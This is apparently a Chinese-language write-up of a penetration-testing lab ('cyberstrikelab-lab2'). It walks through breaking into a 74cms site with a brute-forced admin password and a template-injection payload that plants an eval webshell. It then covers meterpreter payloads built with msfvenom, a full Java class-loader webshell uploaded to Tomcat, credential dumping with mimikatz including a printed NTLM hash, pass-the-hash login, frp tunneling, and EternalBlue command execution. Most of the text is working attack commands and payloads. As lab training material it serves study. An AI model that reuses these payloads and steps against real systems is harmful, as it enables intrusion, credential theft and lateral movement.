cyberstrikelab-lab2
web渗透
最开始已经获取到了对方的内网ip,192.168.10.10 ,通过fscan扫描内网并探测一定数量的端口,扫描结果先808端口是web服务,通过页面的title显示出这是骑士cms内容管理系统
访问这个界面是骑士cms
翻到最底下,发现系统版本
随便找几篇文章看看有没有poc
https://xz.aliyun.com/news/3368
找到一个poc
输入poc,自动跳转到登录界面,看来没有未授权登录漏洞
http://192.168.10.10:808/index.php?m=Admin&c=Tpl&a=set&tpl_dir= ', 'a',phpinfo(),'
尝试访问呢一个不存在的页面,爆出来了thinkphp的版本
使用thinkphp综合利用工具,没有漏洞
方案二,爆破后台账号密码
爆破出密码为admin123456
登录后台
再使用poc,能够正常获取php的版本信息
http://192.168.10.10:808/index.php?m=Admin&c=Tpl&a=set&tpl_dir= ', 'a',phpinfo(),'
继续执行,创建一个一句话木马
http://192.168.10.10:808/index.php?m=Admin&c=Tpl&a=set&tpl_dir= ', 'a',eval($_POST['cmd']),'
https://xz.aliyun.com/news/3368,这篇文章已经告诉我们shell的路径在哪了,他会在这个文件里面创建你执行的恶意代码
来访问这个界面,正常执行我们刚刚嵌入的恶意代码
http://192.168.10.10:808/Application/Home/Conf/config.php
打开蚁剑,输入链接和密码
在c盘找到flag
使用msf创建一个马
msfvenom -p windows/meterpreter/bind_tcp LHOST=10.10.10.173 LPORT=4444 -f exe -o shell.exe
使用蚁剑上传
打开msf,开启监听
# kali
msfconsole
use multi/handler
set payload windows/meterpreter/bind_tcp
set rhost 192.168.10.10
# 蚁剑执行上传成功的木马
shell.exe
内网渗透
上线之后,发现是系统权限。进入命令行
shell
chcp 65001
whoami
# 发现是系统权限,不用额外提权
退出会话,将会话保留在后台
exit
bg
在本机查找fscan
find / -name "fscan*" 2>/dev/null
找到fscan位置后,进入会话1 并上传fscan
sessions 1
upload /data/CS/Cobalt_Strike_4.7/plugin/TaoWu/script/x64/fscan.exe
在当前目录下找到fscan
利用fscan扫内网,发现另外两台主机192.168.10.20和192.168.10.233,20机器的8080端口是web服务
访问界面,是一个tomcat
tomcat文件上传漏洞 https://blog.csdn.net/allintao/article/details/129503762
200表示ok,上传成功
<%!
class U extends ClassLoader {
U(ClassLoader c) {
super(c);
}
public Class g(byte[] b) {
return super.defineClass(b, 0, b.length);
}
}
public byte[] base64Decode(String str) throws Exception {
try {
Class clazz = Class.forName("sun.misc.BASE64Decoder");
return (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);
} catch (Exception e) {
Class clazz = Class.forName("java.util.Base64");
Object decoder = clazz.getMethod("getDecoder").invoke(null);
return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);
}
}
%>
<%
String cls = request.getParameter("passwd");
if (cls != null) {
new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);
}
%>
连接测试
将之前的生成的马上传上去
准备上线msf
# msf
use multi/handler
set payload windows/meterpreter/bind_tcp
set rhost 192.168.10.20
# 蚁剑执行上传成功的木马
shell.exe
成功拿下20权限,使用msfgetsystem进行提权,结果显示,成功提权到system权限
在根目录找到flag2
输入ipconfig,看到另一个网卡地址
再上传fscan,这个新的网卡
upload /data/CS/Cobalt_Strike_4.7/plugin/TaoWu/script/x64/fscan.exe
发现20.30 机器存在永恒之蓝漏洞
再来设置路由,此时你会有两个会话和路由
run autoroute -s 192.168.20.0/24
run autoroute -p
域渗透
上传mimikatz.exe 抓取系统hash
使用find查找
find / -name "mimika*.exe" 2>/dev/null
进入shell
执行命令
.\mimikatz.exe
privilege::debug
sekurlsa::logonpasswords
抓取到administrator用户的NTML hash
0a571981f9373e059c6c6313c2469359
准备好frp配置文件,搭建正向代理,客户端配置
服务端配置
PTH登录,并且上传frp
evil-winrm -i 192.168.10.20 -u Administrator -H "0a571981f9373e059c6c6313c2469359"
upload windows_x64_admin.exe
启动
# kali
./frpc -c frpc.ini
# 靶机
./frps.exe -c frps.ini
修改代理配置文件
vi /etc/proxychains4.conf
使用proxychains代理启动msf
proxychains msfconsole
使用永恒之蓝命令执行模块,能够正常执行命令
use admin/smb/ms17_010_command
set RHOSTS 192.168.20.30
set command whoami
run
找到最后一台机器的flag
set command type C:\\flag.txt
run
暂无评论内容